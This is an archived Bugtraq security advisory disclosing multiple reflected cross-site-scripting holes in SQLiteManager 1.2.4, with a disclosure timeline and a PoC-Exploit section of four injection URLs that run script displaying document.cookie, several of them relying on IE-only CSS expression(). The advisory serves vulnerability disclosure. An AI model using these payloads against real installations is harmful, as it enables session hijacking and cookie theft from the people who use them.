[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

SQLiteManager 1.2.4 Multiple Cross-Site-Scripting vulnerabilities

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: SQLiteManager 1.2.4 Multiple Cross-Site-Scripting vulnerabilities
From: security@xxxxxxxxxxxx
Date: Thu, 5 Jan 2012 17:32:32 GMT

Advisory:               SQLiteManager 1.2.4 Multiple Cross-Site-Scripting 
vulnerabilities
Advisory ID:            INFOSERVE-ADV2011-12
Author:                 Stefan Schurtz
Contact:                security@xxxxxxxxxxxx
Affected Software:      Successfully tested on SQLiteManager 1.2.4
Vendor URL:             http://www.sqlitemanager.org/
Vendor Status:          informed

==========================
Vulnerability Description
==========================

SQLiteManager 1.2.4 is prone to multiple Cross-site-Scripting vulnerabilities

==================
PoC-Exploit
==================

http://[target]/sqlite/main.php?dbsel='"</script><script>alert(document.cookie)</script>

IE-only
http://[target]/sqlite/?nsextt="; stYle="x:expre/**/ssion(alert(document.cookie))
http://[target]/sqlite/index.php?dbsel="; 
stYle="x:expre/**/ssion(alert(document.cookie))
http://[target]/sqlite/index.php?nsextt="; 
stYle="x:expre/**/ssion(alert(document.cookie))

=========
Solution
=========

-

====================
Disclosure Timeline
====================

16-Dec-2011 - informed vendor
05-Jan-2012 - no feedback

========
Credits
========

Vulnerabilities found and advisory written by the INFOSERVE security team.

===========
References
===========

http://www.infoserve.de/system/files/advisories/INFOSERVE-ADV2011-12.txt

Prev by Date: VertrigoServ 2.25 Cross-Site-Scripting vulnerability
Next by Date: ZDI-12-001 : HP Managed Printing Administration img_id Multiple Vulnerabilities
Previous by thread: VertrigoServ 2.25 Cross-Site-Scripting vulnerability
Next by thread: ZDI-12-001 : HP Managed Printing Administration img_id Multiple Vulnerabilities
Index(es):
- Date
- Thread